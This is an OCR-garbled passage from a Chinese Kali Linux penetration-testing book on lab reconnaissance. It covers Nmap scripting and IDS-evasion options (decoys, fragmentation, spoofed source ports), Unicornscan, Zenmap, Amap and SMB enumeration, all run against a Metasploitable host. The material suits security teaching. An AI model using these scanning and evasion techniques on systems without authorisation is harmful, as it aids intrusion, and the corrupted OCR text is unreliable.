上 上述 指令 的 返回 结 采 如 下 。 

Nmap scan report for fe80::a00:27ff:fe43:1518 

Host is up (0.0014s latency). 

Not shown: 996 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

53/tcp open domain 

2121/tcp open ccproxy-ftp 

5432/tcp open postgresql 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds 

上 述 信息 表明 ， 同 一 台 主 机 在 IPv6 网 络 里 开放 的 端口 比 它 在 IPv4 网 
络 里 开放 的 端口 数量 要 少 。 这 是 因为 部 分 服务 程序 尚未 支持 IPvV6 网 
ZH o 

9. 脚本 引擎 

Nmap 本 号 就 古 功 能 强大 的 网 络 探测 工具 。 而 它 的 脚本 引擎 功能 

(Nmap Scripting Engine, NSE) 更 让 Nmap WEE ° NSE 可 使 用 户 

的 各 种 网 络 检查 工作 更 为 目 动 化 ， 有 助 于 识别 应 用 程序 中 新 发 现 的 漏 
洞 、 检 测 程序 版 本 等 Nmap 原 本 不 具有 的 功能 。 虽 然 Nmap 软 件 包 具 有 
各 种 功能 的 脚本 ， 但 是 为 了 满足 用 户 的 特定 需求 ， 它 还 文 持 用 户 撰写 
目 定 义 脚 本 。 

NSE 自 带 的 脚本 由 Lua 语 言 (http//www.lua.org) 编写 。 这 些 脚本 
可 以 分 成 12 个 类 别 。 


e auth: 此 类 脚本 使 用 骏 力 破解 等 技术 找 出 目标 系统 上 的 认证 信 


Fd o 

e default: 局 用 --sC 或 者 -A 选项 时 运行 此 类 脚本 。 这 类 脚本 同时 
具有 下 述 符 点 : 

执行 速度 快 ; 


输出 的 信息 有 指导 下 一 步 操 作 的 价值 ; 
输出 信息 内 容 丰 富 、 形 式 位 滞 ; 
Vo Fi A SE; 
` 会 侵入 目标 系统 ; 
能 泄露 信息 给 第 三 方 。 
e discovery: 该 类 脚本 用 于 探索 网 络 。 
e dos: 该 类 脚本 可 能 使 目标 系统 拒绝 服务 ， 请 谨慎 使 用 。 
e exploit: 该 类 脚本 利用 目标 系统 的 安全 漏洞 。 在 运行 这 类 脚本 之 


前 ， 渗 透 测 试 人 员 需 要 获取 被 测 单位 的 行动 许可 。 

e external: 该 类 脚本 可 能 泄露 信息 给 第 三 方 。 

e fuzzer: 该 类 脚本 用 于 对 目标 系统 进行 模糊 测试 。 

e instrusive: 该 类 脚本 可 能 导致 目标 系统 朋 吝 ， 或 耗 尽 目标 系统 的 
所 有 资源 。 

e malware: 该 类 脚本 检查 目标 系统 上 是 否 存 在 恶意 软件 或 后 门 。 

e safe: 该 类 脚本 不 会 导致 目标 服务 盘 溃 、 拒 绝 服务 且 不 利用 漏 
洞 。 


e version: 配合 版 本 检测 选项 (-sV) ， 这 类 脚本 对 目标 系统 的 服 


务 程序 进行 深入 的 版 本 检测 。 


e vuln: 该 类 脚本 可 检测 检查 目标 系统 上 的 安全 漏洞 。 
在 Kali Linux 系 统 中 ，Nmap 脚 本 位 于 目录 /usr/share/nmap/scripts。 


目前 ，Kali Linux 收 录 的 6.25 版 的 Nmap 之 有 430 多 个 脚本 。 


在 使 用 NSE 脚 本 时 ， 可 以 下 命令 行 里 使 用 下 述 选 项 。 


e -SC EX--script-default: 启动 默认 类 NSE 脚本 。 

e --script <filename>|<category>|<directories> : 根据 指定 的 文件 
名 、 类 别名 、 目 录 名 ， 执 行 相应 的 脚本 。 

e --script-args «args»: 这 个 选项 用 于 给 脚本 指定 参数 。 例 如 ， 在 使 
用 认证 类 脚本 时 ， 可 通过 这 个 选项 指定 用 户 名 和 密码 。 

举例 来 说 ， 如 果 要 使 用 默认 类 的 脚本 对 主机 192.168.56.103 进行 扫 
摘 ， 可 使 用 下 述 指令 。 

nmap -SC 192.168.56.103 

上 述 指令 的 运行 结 采 如 下 。 

Nmap scan report for 192.168.56.103 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 


| ftp-anon: Anonymous FTP login allowed (FTP code 230) 

22/tcp open ssh 

| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd 
(DSA) 

| 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 

25/tcp open smtp 

| smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 
10240000, 

VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 
8BITMIME, DSN, 

| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/ 

organizationName=OCOSA/stateOrProvinceName=There is no such 
thing outside 

US/countryName-X X 


| Not valid before: 2010-03-17T14:07:45+00:00 

| Not valid after: 2010-04-16T14:07:45--00:00 

| ssl-date: 2013-07-21T08:40:20+00:00; -4s from local time. 

53/tcp open domain 

| dns-nsid: 

|_ bind.version: 9.4.2 

111/tcp open rpcbind 

| rpcinfo: 

| program version port/proto service 

| 100000 2 111/tcp rpcbind 

| 100000 2 111/udp rpcbind 

| 100003 2,3,4 2049/tcp nfs 

| 100003 2,3,4 2049/udp nfs 

| 100005 1, 2, 3 35075/udp mountd 

| 100005 1, 2, 3 59685/tcp mountd 

| 100021 1, 3, 4 37466/tcp nlockmgr 

| 100021 1, 3, 4 60726/udp nlockmgr 

| 100024 1 36880/udp status 

|. 100024 1 38557/tcp status 

3306/tcp open mysql 

| mysql-info: Protocol: 10 

| Version: 5.0.51a-3ubuntu5 

| Thread ID: 7 

| Some Capabilities: Connect with DB, Compress, SSL, Transactions, 
Secure Connection 

| Status: Autocommit 

| Salt: 'BijwW-x7HCVi,«*[l 


5900/tcp open vnc 

| vnc-info: 

| Protocol version: 3.3 

| Security types: 

| Unknown security type (33554432) 

6667/tcp open irc 

| irc-info: Server: irc. Metasploitable.L. AN 

| Version: Unreal3.2.8.1. irc. Metasploitable.L. AN 

| Lservers/Lusers: 0/1 

| Uptime: 0 days, 0:15:26 

| Source host: 50388A6E.97684684.FFFA6D49.IP 

| Source ident: OK nmap 

8180/tcp open unknown 

| http-favicon: Apache Tomcat 

| http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

| http-title: Apache Tomcat/5.5 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Host script results: 

| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: 
<unknown>, NetBIOS 

MAC: «unknown? 

| smb-os-discovery: 

| OS: Unix (Samba 3.0.20-Debian) 

| NetBIOS computer name: 

| Workgroup: WORKGROUP 

| System time: 2013-07-21T04:40:20-04:00 


Nmap done: 1 IP address (1 host up) scanned in 46.87 seconds 

可 见 ， 在 使 用 NSE 的 默认 类 脚本 后 ，Nmap 获 取 的 信息 更 为 全 面 。 

您 还 可 能 需要 获取 目标 主机 的 特定 信息 。 此 时 可 以 单独 使 用 脚本 
文件 。 如 果 要 获取 HTTP 服 务 絮 的 信息 ， 将 会 发 现 NSE 的 脚本 里 有 很 多 
脚本 都 是 分 析 HTTP 服 务 的 。 这 些 脚 本 有 http-enum ` http-headers ` http- 
methods 和 http-php-version。 我 们 可 以 使 用 下 述 指令 。 

nmap --script http-enum,http-headers,http-methods,http-php-version -p 
80 

192.168.56.103 

上 述 指令 的 运行 结 采 如 下 。 

Nmap scan report for 192.168.56.103 

Host is up (0.0010s latency). 

PORT STATE SERVICE 

80/tcp open http 

| http-enum: 

| /tikiwiki/: Tikiwiki 

| /test/: Test page 

| phpinfo.php: Possible information file 

| /phpMyAdmin/: phpMyAdmin 

| /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 
(ubuntu) dav/2' 

| /icons/: Potentially interesting folder w/ directory listing 

|_ /index/: Potentially interesting folder 

| http-headers: 

| Date: Sun, 21 Jul 2013 08:45:07 GMT 

| Server: Apache/2.2.8 (Ubuntu) DAV/2 

| X-Powered-By: PHP/5.2.4-2ubuntu5.10 


| Connection: close 

| Content-Type: text/html 

| 

| (Request type: HEAD) 

| http-methods: No Allow or Public header in OPTIONS response 
(status code 200) 

| http-php-version: Versions from logo query (less accurate): 5.1.3 - 
5.1.6, 5.2.0 - 5.2.17 

| Versions from credits query (more accurate): 5.2.3 - 5.2.5 

| Version from header x-powered-by: PHP/5.2.4-2ubuntu5.10 

MAC Address: 08:00:27:43:15:18 (Cadmus Computer Systems) 

Nmap done: 1 IP address (1 host up) scanned in 24.47 seconds 

相 比 不 使 用 脚本 而 言 ， 在 使 用 与 HITP 相 关 的 NSE 脚 本 之 后 ， 我 们 
得 到 与 Web 服 务 有 关 的 更 多 信息 。 

e Web 服务 右上 有 多 个 值得 关注 的 目录 : Tikiwiki ^ test 和 
phpMyAdmin ° 

e 服务 器 上 的 phpinfo.php 可 提供 更 多 信息 。 

e 服务 器 上 PHP 是 5.2.3-5.2.5 之 间 的 某 个 版 本 。 

在 介绍 Nmap 的 时 候 ， 我 们 不 得 不 提 一 个 病 口 扫 揪 脚本 。 

NSE 脚 本 之 中 ， 有 一 个 名 为 Nmap NSEVulscan 的 脚本 。 它 可 从 
http://www.computec. ch/mruef/software/nmap nse vulscan-1.0.targz 下 
载 。 这 个 脚本 能 够 根据 目标 主机 的 版 本 信息 ， 在 多 个 网 站 上 搜索 这 些 
版 本 的 相关 漏洞 。 这 些 网 站 包括 CVE (htp:/cve.mitre.org) ` OSVDB 

(http://www.osvdb.org/) ^ scip VulDB (http://www.scip.ch/?vuldb) ^ 


SecurityTracker ( httpz/securitytracker.com/ ) 和 Security Focus 


(http://www.securityfocus.com/) 。 
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PORT STATE SERVICE REASON VERSION 

22/tcp open ssh syn-ack OpenSSH 5.8p1 Debian 1ubuntu3 
(Ubuntu Linux; protocol 2.0) 

| vulscan: scipvuldb - http://www.scip.ch/en/?vuldb (12 findings): 

| (7775] Red Hat Linux/Fedora 6 OpenSSH glibc error() privilege escalation 
| [4584] OpenSSH up to 5.7 auth-options.c information disclosure 

| [4282] OpenSSH 5.x Legacy Certificate Handler buffer overflow 

| [2667] OpenBSD OpenSSH up to 4.5 Separation Monitor Designfehler 

| [2578] OpenBSD OpenSSH up to 4.4 Signal Handler race condition 

| [1999] OpenBSD OpenSSH up to 4.2pl scp system() Designfehler 

| [1724] OpenBSD OpenSSH up to 4.2pl GSSAPIDelegateCredentials Designfehler 
| [1723] OpenBSD OpenSSH up to 4.2pl Dynamic Port Forwarding Designfehler 

| [1083] Nokia IPSO 3.x OpenSSH Designfehler 

| [299] OpenBSD OpenSSH 3.7p1/3.7.1p1 PAM Handler Konfigurationsfehler 

| [287] OpenBSD OpenSSH up to 3.7.1 buffer append space() buffer overflow 

| [100] OpenSSH Client IP Restrictions weak authentication 

| 
| 


cve - http://cve.mitre.org (69 findings): 
| [(CVE-2012-6066] freeSSHd.exe in freeSSHd through 1.2.6 allows remote 
attackers to bypass authentication via a crafted session, as demonstrated 
by an OpenSSH client with modified versions of ssh.c and sshconnect2.c. 
| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia 
Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 
6.3.0 through 6.3.2 on UNIX and Linux, when old-style password 
authentication is enabled, allows remote attackers to bypass authentication 
via a crafted session involving entry of blank passwords, as demonstrated 
by a root login session from a modified OpenSSH client with an added 
input userauth passwd changereq call in sshconnect2.c. 
| [CVE-2012-5536] A certain Red Hat build of the pam ssh agent auth module 
on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc 
error function instead of the error function in the OpenSSH codebase, which 
allows local users to obtain sensitive information from process memory or 
possibly gain privileges via crafted use of an application that relies on 
this module, as demonstrated by su and sudo. 
| (CVE-2012-0814] The auth parse options function in auth-options.c in sshd 
in OpenSSH before 5.7 provides debug messages containing authorized keys 
command options, which allows remote authenticated users to obtain 
potentially sensitive information by reading these messages, as 


图 6.5 


10. 规避 检测 的 选项 
在 渗透 测试 的 工作 中 ， 目 标 主机 通常 处 于 防火 墙 或 IDS 系统 的 保 
护 之 中 。 在 这 种 环境 中 使 用 Nmap 的 默认 选项 进行 扫描 ， 不 仅 会 被 发 
现 ， 而 且 往 往 一 无 所 获 。 此 时 ， 我 们 就 要 使 用 Nmap 规 避 检 测 的 有 关 选 
项 。 
f (使 用 小 数据 包 ) : 这 个 选项 可 避免 对 方 识别 出 我 们 探测 的 数 
Ex. 指定 这 个 选项 之 后 Nmap 将 使 用 8 字 节 甚至 更 小 数据 体 的 数据 
I, o 


e —mtu: 这 个 选项 用 来 调整 数据 包 的 包 大 小 。MTU (Maximum 
Transmission Unit， 最 大 传输 单元 ) 必须 是 8 的 整数 倍 ， 否 则 Nmap 将 报 
TH ° 

e-D (51H) : 这 个 选项 应 指定 假 耻 ， 即 诱饵 的 了 P。 局 用 这 个 选 
项 之 后 ，Nmap 在 发 送 侦 测 数据 包 的 时 候 会 摊 杂 一 些 源 地 址 是 假 IP (US 
TH) 的 数据 包 。 这 种 功能 意 在 以 藏 木 于 林 的 方法 掩盖 本 机 的 真实 IP. © 
也 就 是 说 ， 对 方 的 log 还 会 记录 下 本 机 的 真实 IP。 您 可 使 用 RND 生 成 随 
机 的 假 耻 地 址 ， 或 者 用 RND: number 的 参数 生成 <number> 个 假 卫 地 
址 。 您 所 指定 的 诱 钮 主机 应 当 在 线 ， 否 则 很 容易 击 江 目标 主机 。 田 
外 ， 使 用 了 过 多 的 诱饵 可 能 造成 网 络 拥堵 。 尤 其 是 在 扫 搞 客户 的 网 络 
的 时 候 ， 您 应 当 极力 避免 上 述 情 况 。 

e --source-port <portnumber> 或 -g 《模拟 源 端口 ) : 如 采 防 火 墙 只 
人 允许 某 些 源 端 口 的 入 站 流量 ， 这 个 选项 丈 非 锅 有 用 。 

e --data-length: 这 个 选项 用 于 改变 Nmap 发 送 数据 包 的 默认 数据 长 
度 ， 以 避免 被 识别 出 来 是 Nmap 的 扫描 数据 。 

e --max-parallelism: 这 个 选项 可 限制 Nmap 并 发 扫描 的 最 大 连接 
ZW o 

e --scan-delay «time»: 这 个 选项 用 于 控制 发 送 探测 数据 的 时 间 间 
隔 ， 以 避免 达到 IDS/IPS 端 口 扫描 规则 的 国 值 。 

Nmap 的 官方 手册 详细 介绍 了 规避 探测 的 各 种 选项 。 如 果 您 需要 详 
细 了 解 这 些 内 容 ， 请 参照 官方 手册 http:/nmap.org/book/man-bypass- 


firewalls-ids.html ° 


$ 


6.2.2 Unicornscan 


Unicormnscan 是 信息 收集 和 关联 分 析 的 引 击 。 它 能 对 TCP/IP 设 备 发 
起 主动 扫描 ， 并 根据 其 响应 进行 分 析 。Unicornscan 具 备 下 壕 特性 : 
e 可 进行 异步 无 状态 TCP 端口 扫描 ; 


e 可 通过 异步 无 状态 TCP 扫 摘 获取 TCP banner; 

e 可 进行 异步 UDP 端口 扫描 ; 

e 可 通过 主动 方式 和 被 动 方式 识别 远程 操作 系统 和 应 用 程序 。 

默认 安装 的 Kali Linux 并 不 带 有 Unicornscan 程序 。 您 可 通过 软件 
PERE ° 

apt-get install unicornscan 

如 需 启 动 Unicornscan， 可 在 终端 中 使 用 下 述 指令 。 

# unicornscan -h 

该 指令 将 显示 所 有 的 选项 及 使 用 方法 。 

Unicornscan 和 其 他 类 似 工具 主要 区 别 在 于 其 扩展 性 和 高 效 性 。 经 
验 表 明 ，UDP 端口 扫 摘 的 耗 时 都 很 长 ， 扫 描 整 个 网 段 的 UDP 应 口 的 耗 
时 更 长 。 不 过 Unicornscan 在 这 方面 的 性 能 卓越 。 

您 可 以 设置 Unicornscan 每 秒 发 送 多 少 个 包 。 每 秒 发 送 包 (PPS) 设 
置 得 越 高 ， 扫 描 的 速度 也 就 越 快 ， 但 会 导致 网 络 负载 加 重 ， 注 意 谨慎 
使 用 此 功能 。PPS 的 默认 值 是 300。 

本 文 将 使 用 Unicornscan 的 黑 认 选项 扫描 一 全 目标 主机 ， 以 介绍 指 
令 和 输出 。 

假设 我 们 要 扫描 主机 192.168.56.103， 检 测 它 的 UDP 协议 (-m 
U) 的 1-65535 端 口 ， 并 查看 程序 的 详尽 输出 CIv) ， 那 么 我 们 需要 使 
Hi Pxüi8 ° 

# unicornscan -m U -Iv 192.168.56.103:1-65535 

运行 上 述 指 令 后 ， 程 序 的 提示 信息 如 下 。 

adding 192.168.56.103/32 mode 'UDPscan' ports '1-65535' pps 300 


using interface(s) eth0 


scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a 
little longer than 3 Minutes, 45 Seconds 


Lx Ze, TETEH] PPS 的 默认 值 的 情况 下 ，Unicornscan 8514 
描 时 间 大 约 是 3 分 钟 。 为 了 加 快 扫描 速度 ， 我 们 把 发 包 速 率 调 整 为 1 万 
(-r 10000) ° 
unicornscan -m U -Iv 192.168.56.103/24:1-65535 -r 10000 
运行 上 述 指 令 后 ， 程 序 的 提示 信息 如 下 。 
adding 192.168.56.103/32 mode 'UDPscan' ports '1-65535' pps 10000 


using interface(s) eth0 


scaning 1.00e+00 total hosts with 6.55e+04 total packets, should take a 
little longer than 13 Seconds 

调整 发 包 速 率 PPS 参数 之 后 ， 扫 描 速度 提升 很 多 。 请 注意 您 只 能 
在 网 络 速度 足够 快 的 情况 下 才能 修改 这 个 参数 ， 否 则 将 拖 塔 整个 网 
络 。 

上 述 指令 的 扫描 结 采 如 下 。 

UDP open 192.168.56.103:137 ttl 64 

UDP open 192.168.56.103:53 ttl 64 

UDP open 192.168.56.103:41250 ttl 64 

UDP open 192.168.56.103:2049 ttl 64 

UDP open 192.168.56.103:111 ttl 64 

sender statistics 7586.6 pps with 65544 packets sent total 


listener statistics 14 packets recieved 0 packets dropped and 0 interface 
drops 

UDP open domain[ 53] from 192.168.56.103 ttl 64 

UDP open sunrpc[ 111] from 192.168.56.103 ttl 64 

UDP open mnetbios-ns[ 137] from 192.168.56.103 ttl 64 

UDP open shilp[ 2049] from 192.168.56.103 ttl 64 

UDP open unkown[41250] from 192.168.56.103 ttl 64 


6.2.3 Zenmap 


Zenmap 是 Nmap 的 图 形 化 工具 。 相 较 于 Nmap，Zenmap 具 备 如 下 优 
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e Zenmap 的 交互 性 更 好 ， 输 出 更 为 直观 ， 甚 至 能 将 网 络 的 探索 结 
果 绘 制 成 拓扑 图 。 

e 可 以 比较 两 次 扫描 的 结果 。 

e 能 够 记录 扫描 的 结 

e 渗透 人 员 可 调整 Zenmap 的 配置 文件 ， 以 使 用 相同 的 配置 进行 多 
次 扫描 。 

e 会 显示 所 执行 的 指令 ， 便 于 渗透 测试 人 员 检 查 指 令 的 正确 性 。 

如 需 启 动 Zenmap 程序 ， 可 在 桌面 菜单 中 依次 选中 Kali Linux | 
Information Gathering | Network scanners | Zenmap, ， 也 可 在 终端 中 使 用 
下 述 指令 。 

# Zenmap 

该 命令 执行 将 显示 Zenmap 主 窗口 ( 见 图 6.6) 。Zenmap 预 设 有 10 种 
扫描 模式 的 配置 文件 。 点 击 菜单 Profile 就 可 以 看 到 相应 扫描 方式 以 及 相 
应 的 命令 选项 。 程 序 的 Command 文 本 框 会 显示 具体 的 指令 和 选项 。 


Zenmap 


Scan Tools Profile Help 


Target: + Profile: Regular scan 


Command: |nmap Intense scan 

Intense scan plus UDP 

NEU Services Nmap Output) Ports JH intense scan, all TCP ports 

OS 4 Host M Intense scan, no ping 

Ping scan 

Quick scan 

Quick scan plus 

Quick traceroute 

Regular scan 


Slow comprehensive scan 


图 6.6 

如 果 预 设 的 扫描 选项 未 能 符合 我 们 的 需求 ， 我 们 可 以 创建 一 个 新 
的 扫描 配置 文件 (profile) ， 还 可 以 编辑 已 有 的 配置 文件 。 我 们 可 以 通 
Profile P 5¢ OX EPRE 。 

JI GA EMEF, PAJEK A New Profile 或 编辑 Command X 
本 框 ， 或 使 用 快捷 键 Cal+P。 如 需 编 辑 已 有 的 配置 文件 ， 可 选择 染 单 项 
Edit Selected Profile 或 使 用 快捷 键 Ctl+E。 

在 调整 选项 时 ， 可 在 选项 卡 (Profile、Scan ` Ping ` Scripting ` 
Target、Source、Other 和 Timing) 下 根据 需求 进行 相应 配置 。 在 调整 过 
配置 选项 之 后 ， 单 击 Save Changes 按 钮 剑 存 该 扫 拉 配置。 这 个 过 程 如 图 
6.7 所 示 。 


Profile Editor 
nmap 
Help 


Disable reverse ONS 
Scan options resolution 


Profile | Scan| Ping Scripting Target Source Other Timing 


Targets (optional): | Never do reverse DNS. This 


can slash scanning times. 
TCP scan: None 9 


Non-TCP scans: None 
Timing template: None 
Enable all advanced/aggressive options (-A) 
Operating system detection (-O) 
Version detection (-sV) 
Idle Scan (Zombie) (-s!) 
FTP bounce attack (-b) 
Disable reverse DNS resolution (-n) 
IPv6 support (-6) 


Cancel fa Save Changes 


图 6.7 
本 文选 用 Regular Scan (常规 扫描 ) 的 配置 文件 ， 扫 描 
192.168.56.1-254 的 所 有 主机 ， 如 图 6.8 所 示 。 


Scan Tools Profile Help 


Target: |192.168.56.1-254 Ly | Profile: 
Command: |nmap 192.168.56.1-254 


— Services | oo u r 
v | nmap 192.168.56.1- 254 $| - 


Nmap scan report for 192.168.56.101 
192.168.56.101 Host is up (0.0013s latency). 

Not shown: 999 filtered ports 
192.168.56.102 国 ipeRT STATE SERVICE 
192.168.56.103 1025/tcp open NFS-or-IIS 

MAC Address: 08:00:27:06:E0:35 (Cadmus 

Computer Systems) 


192.168.56.100 


Nmap scan report for 192.168.56.102 

Host is up (0.000047s latency). 

All 1066 scanned ports on 192.168.56.102 are 
closed 


Nmap scan report for 192.168.56.103 
Host is up (0.00085s latency). 

Not shown: 977 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 


图 6.8 
如 果 需 要 查看 网 络 拓扑 图 ， 可 点 击 Topology 标 签 ， 这 将 看 到 图 6.9 
所 示 的 界面 。 


Zenmap BLE 


Scan Tools Profile Help 


Target: fı 92.168.56.1-254 Y Profile: [Regular scan VY | | Scan 


Command: |nmap 192.168.56.1-254 


' Fr- 一 一 一 
| Hosts | Services | Nmap Output Ports/Hosts Topology Host Details Scans. 
os Host Hosts Viewer Fisheye Controls Save Graphic 
.= 192.168.56 
B 19210856; ws 
M 192.168.56.: 
M 192.168.56.: H 


PI ld 
er" A 


O 182:168.56.102 nis © 加 192.168.56.100 


Oie2.168.56.101 


al [^ EL an | ^ Lx M 
| Fisheye on ring 1.00 | U withinterestfactor |2.00 |, andspreadfactor |0.50 | 


图 6.9 
如 需 保 存 Zenmap 的 扫描 结果 ， 可 在 Scan 荣 单 中 选择 Save Scan。 
Zenmap 将 会 询问 将 文件 保存 至 何 处 ， 默 认 情 况 下 将 保存 为 XML 文件 
( 见 图 6.10) ° 


Name: | xml | 
Save in folder: | < |root | Œ Desktop Create Folder 


Places Name v Size Modified | 
Q} Search | 
© Recently Used 
Ea root 


CJ File System 


Select File Type: Nmap XML format (xml) v | 


Cancel Save 


图 6.10 


如 需 比较 两 次 扫描 结果 之 间 的 差异 ， 首 先进 行 第 一 次 扫 摘 ， 并 保 
存 第 一 次 扫描 的 扫 摘 结果。 在 修改 扫描 目标 之 后 ， 进 行 第 二 次 扫描 并 
再 次 保存 扫描 结果 。 然 后 ， 在 Tools 染 单 中 选择 Compare Results ， 对 扫 
FH ZH ANTE TT LES © 

点 击 两 个 Open 按 钮 ， 分 别 指定 A Scan 和 B Scan 的 扫描 结果 ， 如 图 
6.11 所 示 。 


Compare Results 


A Scan B Scan 
P Scan Output P Scan Output 


MOSt LS Up. 


+Not shown: 979 closed ports 
PORT STATE SERVICE VERSION 
21/tcp open ftp 


23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

1ll/tcp open rpcbind 

139/tcp open netbios-ssn 

445/tcp open microsoft -ds 

512/tcp open exec 

513/tcp open login 

514/tcp open shell 

1099/tcp open rmiregistry 

1524/tcp open ingreslock 

2049/tcp open nfs 

2121/tcp open ccproxy-ftp 
| | A 


n^octaracal 


KAR? /ten anan 
‘ > ë ëD 


图 6.11 


字符 “-” 代 表 B Scan 的 结果 中 没有 该 项 内 容 ;， 相 对 地 ， 字 符 “+ ”表明 
B Scan 的 扫 朱 结 末 中 增加 了 该 项 扫 摘 结 

上 述 扫描 结果 表明 ， 在 第 二 次 扫描 中 的 SSH 端 口 和 MySQL 端 口 都 
不 再 处 于 开放 状态 ， 关 闭 并 口 的 数目 也 从 977 个 相应 变化 为 979 个 。 


6.2.4 Amap 


Amap 程 序 可 检测 在 指定 端口 上 运行 的 应 用 程序 信息 。Amap 辣 目 
标 端 口 发 送 检测 数据 ， 在 收 到 目标 响应 之 后 ， 将 响应 信息 与 数据 库 中 
结果 进行 匹配 ， 并 显示 出 匹配 的 应 用 程序 。 

在 Kali Linux 中 , Amap 检测 数据 包 的 配置 文件 
为 /usr/etc/appdefs.trig， 而 啊 应 信息 的 文件 是 /usr/etc/appdefs.resp。 

如 需 局 动 Amap 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

amap 

该 命令 将 显示 它 的 使 用 说 明和 指令 范例 。 

本 例 将 使 用 Amap 程 序 分 析 目 标 主 机 22 端 口上 运行 的 应 用 程序 。 我 
们 局 用 -b 选 项 以 获取 端口 的 banner 人 信息， 同时 通过 -q 选 项 禁止 程序 报告 
关闭 的 《或 不 可 识别 的 ) 端口 。 我 们 使 用 下 述 指令 。 

amap -bq 192.168.56.103 22 

上 述 指令 的 运行 结 采 如 下 。 

Protocol on 192.168.56.103:22/tcp matches ssh - banner SSH- 
2.00penSSH 4.7p1 Debian-8ubuntu1\n 

Protocol on 192.168.56.103:22/tcp matches ssh-openssh - banner: SSH- 
2.0-OpenSSH 4.7p1 Debian-8ubuntu1\n 

Amap 程 序 还 能 够 识别 指定 端口 上 运行 的 应 用 类 型 及 其 版 本 信息 。 

如 需 扫 描 更 多 的 端口 ， 可 在 命令 行 中 指定 多 个 端口 ， 端 口 之 间 用 
"ETE We. (UA: 

amap -bq 192.168.56.103 80 3306 

上 述 指令 的 运行 结 采 如 下 。 

Protocol on 192.168.56.103:3306/tcp matches mysql - banner: 

>\n5.0.51a-3ubuntu5/?,’~yel,nd,M~Ti3ap/5Bad handshake 

Protocol on 192.168.56.103:22/tcp matches ssh - banner: 

SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n 
Protocol on 192.168.56.103:22/tcp matches ssh-openssh - banner: 


SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1\n 
Amap 可 以 识别 在 3306 端 口上 运行 的 是 MySQL 服 务 ， 但 在 识别 22 端 
口上 运行 的 服务 时 ， 却 找到 了 多 个 匹配 。 
在 快速 识别 应 用 服务 程序 方面 ，Amap 程 序 可 谓 一 枝 独 秀 。 


6.3 SMB 枚 举 


如 果 您 所 测试 的 目标 主机 是 Windows 主机 ， 那 么 使 用 nbtscan 之 类 
HJ SMB (Server Message Block) 枚 举 工具 可 以 直截了当 地 获取 该 系统 
的 信息 

nbtscan 工 具 可 以 扫描 IP 地 址 并 获取 NetBIOS 名 称 信息 。 它 所 生成 的 
扫描 报告 含有 相应 主机 的 IP 地 址 、NetBIOS 计 算 机 名 、 、 服 务 名 称 -EE 
录 的 用 户 名 和 MAC 地 址 信息 。 

这 些 信 息 在 渗透 测试 的 后 续 阶 段 将 发 挥 作用 。Kali 的 nbtscan 程 序 和 
Windows 自 带 的 nbtstat 程 序 不 同 ， 它 可 对 一 个 网 段 内 所 有 IP 地 址 进行 操 
作 。 您 可 以 想象 得 出 来 ， 这 款 工具 将 产生 大 量 的 网 络 流量 ， 而 且 可 能 
被 目标 主机 记录 在 Log 里 。 

如 需 了 解 NetBIOS 报 告 中 每 个 服务 的 功能 ， 可 在 微软 知识 库 (URL 
地 址 为 http://support.microsoft.com/kb/163409 ) 里 查询 NetBIOS 服 务 名 
称 的 第 16 个 字符 (BINetBIOS/5 28) 

可 以 在 终端 中 直接 输入 nbtscan 来 启动 它 。 

如 和 欲 搜索 192.168.56.0 内 各 主机 的 NetBIOS 名 称 ， 可 使 用 下 述 指 


d 


nbtscan 192.168.56.1-254 

该 指令 的 返回 结果 如 下 。 

Doing NBT name scan for addresses from 192.168.56.1-254 

IP address NetBIOS Name Server User MAC address 


192.168.56.103 METASPLOITABLE «server» METASPLOITABLE 

00:00:00:00:00:00 

上 述 结 果 表 明 ， 程 序 找到 了 1 个 名 为 METASPLOITABLE 的 
NetBIOS 名 称 。 

接 下 来 ， 我 们 使 用 下 述 指令 查看 这 人 台 主 机 的 网 络 服务 。 

nbtscan -hv 192.168.56.103 

该 指令 的 返回 结 采 如 下 。 

Doing NBT name scan for addresses from 192.168.56.103 

NetBIOS Name Table for Host 192.168.56.103: 

Incomplete packet, 281 bytes long. 


Name Service Type 
METASPLOITABLE Workstation Service 
METASPLOITABLE Messenger Service 
METASPLOITABLE File Server Service 
METASPLOITABLE Workstation Service 
METASPLOITABLE Messenger Service 
METASPLOITABLE File Server Service 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
WORKGROUP Domain Name 
WORKGROUP Browser Service Elections 
Adapter address: 00:00:00:00:00:00 


上 述 结 果 表 明 ， 主 机 METASPLOITABLE 运 行 着 File Server Service 
和 Messenger Service 等 网 络 服务 。 


6.4 SNMP 枚 举 


本 市 将 介绍 检查 SNMP (Simple Network Monitoring Protocol) 协议 
的 几 款 工具 。 虽 然 多 数 SNMP 信 息 看 上 去 并 不 那么 重要 ， 但 是 对 于 渗透 
测试 人 员 来 说 ， 他 们 可 以 从 配置 不 当 的 SNMP 设 备 上 获取 配置 文件 ， 控 
掘 重要 信息 ， 甚 至 可 能 有 权限 修改 它 的 配置 文件 。 

建议 您 在 渗透 测试 的 工作 中 检查 SNMP 设 备 ， 可 能 会 遇 到 的 惊喜 。 


6.4.1 onesixtyone 


onesixtyone 程序 是 SNMP 扫描 程序 ， 它 可 扫描 指定 设备 ， 确 定 它 
